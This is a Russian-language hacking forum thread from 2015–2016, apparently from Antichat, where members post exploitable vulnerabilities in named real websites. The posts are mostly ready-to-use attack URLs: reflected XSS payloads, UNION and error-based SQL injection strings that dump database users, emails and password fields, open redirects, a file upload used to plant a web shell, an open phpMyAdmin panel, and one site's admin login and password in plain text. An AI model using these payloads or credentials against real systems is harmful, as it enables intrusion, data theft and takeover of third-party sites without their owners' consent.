Уязвимости SQLi, XSS и другие.

SaNDER · 24 Oct 2015

Redirect

Code:

blagoveshchensk-amur.websender.ru/redirect.php?url=http://вашсайт/

Code:

partop.ru/redirect.php?url=http://вашсайт/

.

Code:

budennovsk.g-o-r-o-d.ru/url.php?url=http...

SaNDER · 25 Oct 2015

XSS-Reflected
Code:
"><script>alert()</script>
Сайт : _ttp://hibiny.com/
В поисковике .

XSS-Reflected
Url:
Code:
_ttp://ntagil.rutaxi.ru/index.html?state=closedialog
Жмём "Дополнительные параметры",ищем строку "№ корп.ка" и вводим туда свой скрипт . В моём случае
Code:
"><script>alert()</script>
и скрипт сразу срабатывает . Вбивается под строкой "Дополнительные параметры" .

Waki · 26 Oct 2015

UNION query

Code:

http://www.alda-europe.eu/newSite/project_dett.php?ID=ID=-8135%20UNION%20ALL%20SELECT%205511,5511,5511,5511,5511,5511,5511,5511,5511,5511,version(),5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511#

5.0.92-enterprise-gpl-log

тиц 30
pr 6

SaNDER · 5 Nov 2015

XSS-Reflected .
Сайт:_ttp://stranasp.ru
Code:
"><script>alert()</script>

joelblack · 6 Nov 2015

target: http://www.bankmtb.ru/
type: XSS Reflected
Строка поиска:
Code:
"><script>alert(1337)</script>
target: http://www.transstroybank.ru
type: XSS Reflected
Строка поиска:
Code:
"><script>alert('Hello')</script>

private_static · 6 Nov 2015

Target:gismeteo.ru
Type:XSS Reflected
ТИЦ:23k

Code:

http://informer.gismeteo.ru/html/getinformer_new.php?tnumber=1&city0=4980Кишинев<script>alert("xss")</script>&codepg=utf-8&par=4&inflang=rus&domain=ru&vieinf=2&p=1&w=1&tblstl=gmtbl&tdttlstl=gmtdttl&tdtext=gmtdtext&new_scheme=1

SaNDER · 25 Nov 2015

Ссылка : _ttp://www.golovastik.ru .
Тип : XSS-Reflected .
Code:
"><script>alert()</script>
вводится в поисковике .

R3hab · 29 Dec 2015

VLS | Сервер деревенской жизни
SQLi
HTML:
http://villagelifeserver.ru/pack.php?ID=-4%27%20union%20select%201,group_concat(ID,0x3a,UUID,0x3a,nick,0x3a,password,0x3a,sex,0x3a,status),3,4,5,6,7,8,9,10,11,12,13%20FROM%20users--+f
ТИЦ 10
AR 558,485

Octavian · 31 Dec 2015

Arbitrary file upload
http://piatalipcani.md/ro/add_anunt.php
Заливаем через картинку shell.phtml
Получяем http://piatalipcani.md/img_anunt/shell.phtml

Octavian · 31 Dec 2015

Phpmyadmin без пароля
http://ctice.md:8082/phpmyadmin
ФЛЕШКА )
http://maestro.md/

blackhead · 4 Jan 2016

Code:

http://www.dortekarrebaek.dk/newsdetail.php?id=193+union+select+1,user(),version(),4+--

[email protected]
5.5.47-MariaDB-1~wheezy

Code:

http://www.afmec.org/admin/index.php?msg=<script>alert("LOL")</script>

Code:

http://www.trex.uqam.ca/index.php?action=<script>alert("LOL")</script>

R3hab · 5 Jan 2016

Meghalaya Board of School Education
SQLi
HTML:
http://www.mbose.in/more.php?category=home&id=2%27%20union%20select%201,group_concat(table_name),3,4%20FROM%20INFORMATION_SCHEMA.TABLES--+f
PR 3
AR 796,284
5.5.36-cll

ph03nix · 7 Jan 2016

http://websurf.ru/signup.php
Поле: Ваше имя
Code:
"><script>alert('HakNet')</script>
http://id.ykt.ru/page/register
Поле: Ник в сети Ykt.Ru
Code:
"><script>alert('HakNet')</script>

ph03nix · 8 Jan 2016

http://lawyerstars.ru/
Во все поля
Code:
"><script>alert('Ph03niX')</script>

blackhead · 13 Jan 2016

1. Target: courtnews.co.nz PR 3
Type: SQLi
Code:
http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+user%28%29,version%28%29,3+--
hooked_hooked@localhost
5.1.73-cll
На сайте есть блог wp, можно попробовать украсть куки через XSS
Code:
http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+1,0x3C7363726970743E616C657274282758585827293C2F7363726970743E,3+--
2. Target: beloboka.ru ТИЦ 60
Type: SQLi
Code:
http://beloboka.ru/beloboka/index.php?mode=sections&id=-53+UNION+SELECT+1,2,3,4,user(),version()+--
beloboka@localhost
5.6.19-log
Админка http://beloboka.ru/beloboka/cp
Пароль и логин в базе. В админке есть возможность залить любой файл.

Шниперсон · 31 Jan 2016

Type: SQLi
http://www.banknotymira.ru/?nav=pozition&id=-6074'+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13'-- -
http://www.banknotymira.ru/admin
admin - login
15182 - password
bkmir_u43895@localhost

nordwarrior · 31 Jan 2016

SQL-i

Code:

http://www.northbaybiz.com/bizResources/Press_Releases/index.php?uid=999999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_email,user_pass),8,9,10,11,12,13,14,15,16,17,18,19+from+wp_users--

Filipp · 9 Mar 2016

XSS-reflected:

Code:

http://blog.rebz.net/wp-includes/js//swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

atata · 25 Mar 2016

http://www.oldtown-apartments.com/index.php?cat=1 and (select 1 from (Select count(*),Concat((select user()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)&id=14

atata · 25 Mar 2016

http://dlib.statistics.gr/portal/pa...les?p_topic=10007369&p_cat=10007369&p_catage=<script>alert(123);</script>

Уязвимости SQLi, XSS и другие.

SaNDER Banned

SaNDER Banned

Waki Member

SaNDER Banned

joelblack Reservists Of Antichat

private_static Member

SaNDER Banned

R3hab Member

Octavian Elder - Старейшина

Octavian Elder - Старейшина

blackhead New Member

R3hab Member

ph03nix New Member

ph03nix New Member

blackhead New Member

Шниперсон Member

nordwarrior New Member

Filipp Elder - Старейшина

atata Active Member

atata Active Member

массовый взлом сайтов

Взлом сайтов

Useful Searches

Уязвимости SQLi, XSS и другие.

SaNDER Banned

SaNDER Banned

Waki Member

SaNDER Banned

joelblack Reservists Of Antichat

private_static Member

SaNDER Banned

R3hab Member

Octavian Elder - Старейшина

Octavian Elder - Старейшина

blackhead New Member

R3hab Member

ph03nix New Member

ph03nix New Member

blackhead New Member

Шниперсон Member

nordwarrior New Member

Filipp Elder - Старейшина

atata Active Member

atata Active Member

массовый взлом сайтов

Взлом сайтов